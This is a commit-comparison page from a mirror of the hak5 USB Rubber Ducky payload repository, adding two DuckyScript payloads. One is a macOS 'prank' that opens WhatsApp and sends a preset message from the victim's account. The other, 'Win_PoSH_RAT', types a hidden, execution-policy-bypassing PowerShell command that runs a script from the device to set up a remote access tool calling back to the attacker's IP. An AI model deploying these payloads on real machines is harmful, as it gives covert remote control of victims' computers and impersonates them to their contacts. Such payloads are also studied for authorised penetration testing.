hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: hak5:f375621da102ef52983dfde53efa94565bbe8831
Branches Tags
hak5:master
hak5:improve-duckylogger
hak5:more_extensions
hak5:add-docs
...
compare: hak5:cc823d126b0bab396a9d3617fe1158212a3e029e
Branches Tags
hak5:master
hak5:improve-duckylogger
hak5:more_extensions
hak5:add-docs

7 Commits
f375621da1 ... cc823d126b

Author SHA1 Message Date
cribb-it cc823d126b
Merge 59c5175b3e into b495fcf019 2024-11-17 20:48:42 +01:00
Peaks b495fcf019
Merge pull request #499 from brunoooost/master 
Adding Send-WhatsApp-Message-MacOS
 2024-11-15 09:33:36 -05:00
bst04 2bb2878554 move payload to execution folder 2024-11-12 19:21:13 +01:00
bst04 f5a2ceec62
Merge branch 'hak5:master' into master 2024-11-11 08:34:04 +01:00
bst04 97be872ded adding Send-WhatsApp-Messages-MacOS 2024-11-11 08:33:17 +01:00
cribb-it 59c5175b3e Fix for Peaks 2024-05-22 16:53:14 +01:00
cribb-it 61b9a826cf New Payload 2024-01-08 20:59:56 +00:00
5 changed files with 221 additions and 0 deletions
Show Stats Expand all files Collapse all files

30
payloads/library/execution/Send-WhatsApp-Messages-MacOS/README.md Normal file
View File

@ -0,0 +1,30 @@
# Send WhatsApp Messages - MacOS
This script is written in **DuckyScript 3.0** and enables automatic sending of a message via **WhatsApp** on an **MacOS** device. The script waits until the system is ready (using **Caps Lock** detection as an indicator), then launches WhatsApp, types a predefined message, and sends it.
### Details
- **Title**: Send WhatsApp Messages - MacOS
- **Author**: bst04 - Aleff
- **Version**: 1.0
- **Category**: Prank
- **Target**: MacOS devices
### Dependencies
- Enter the phone number to which you want to send the message via Whatsapp
`DEFINE #PHONE-NUMBER example`
- Set the text message that you want to send
`DEFINE #TEXT-MESSAGE example`
### How It Works
1. Sets a user-defined text message (`#TEXT-MESSAGE`) to be sent via WhatsApp to the number defined too (`#PHONE-NUMBER`).
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
3. After readiness is confirmed, the script:
- Runs commands to open **WhatsApp**.
- Types the specified phone number to open the chat
- Types the message and sends it.

69
payloads/library/execution/Send-WhatsApp-Messages-MacOS/payload.txt Normal file
View File

@ -0,0 +1,69 @@
REM_BLOCK
#################################################
# #
# Title : Send WhatsApp Messages - MacOS #
# Author : bst04 - Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : MacOS #
# #
#################################################
END_REM
REM Enter the phone number to which you want to send the message via Whatsapp
DEFINE #PHONE-NUMBER example
REM Write the message you wish to send
DEFINE #TEXT-MESSAGE example
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
DELAY 200
GUI h
DELAY 150
GUI SPACE
DELAY 150
BACKSPACE
DELAY 500
STRINGLN WhatsApp
DELAY 1500
GUI f
DELAY 500
STRINGLN #PHONE-NUMBER
DELAY 250
DOWNARROW
DELAY 250
DOWNARROW
DELAY 250
SPACE
DELAY 250
STRINGLN #TEXT-MESSAGE

59
payloads/library/execution/Win_PoSH_RAT/R.ps1 Normal file
View File

File diff suppressed because one or more lines are too long

41
payloads/library/execution/Win_PoSH_RAT/payload.txt Normal file
View File

@ -0,0 +1,41 @@
REM TITLE R.A.T
REM AUTHOR TRIBBIC
REM DESCRIPTION Set up a R.A.T on the target windows machine
REM DUCKY SCRIPT 3
REM USERNAME to login to the R.A.T
DEFINE #USERNAME name
REM Your IP Address use https://www.ipchicken.com/ to get your IP
DEFINE #IPADDRESS 192.168.1.1
ATTACKMODE HID STORAGE
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
GUI r
DELAY 200
STRINGLN powershell -Noni -NoP -W h -EP Bypass $U='#USERNAME';$IP='#IPADDRESS'; iex((Get-Volume -FileSystemLabel 'DUCKY').DriveLetter+':\R.ps1')

22
payloads/library/execution/Win_PoSH_RAT/readme.md Normal file
View File

@ -0,0 +1,22 @@
# RAT
- Author: TRIBBIC
- Version: 1.0
- Target: Windows 10 (Powershell 5.1+)
- Category: Execution
- Attackmode: HID & Storage
- Ducky Script Version: 3
## Setup
In the payload.txt change the two DEFINE's
\#USERNAME Should be your login name
\#IPADDRESS Should be your IP Address
## Description
Create a R.A.T using Windows Powershell on Targets PC
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |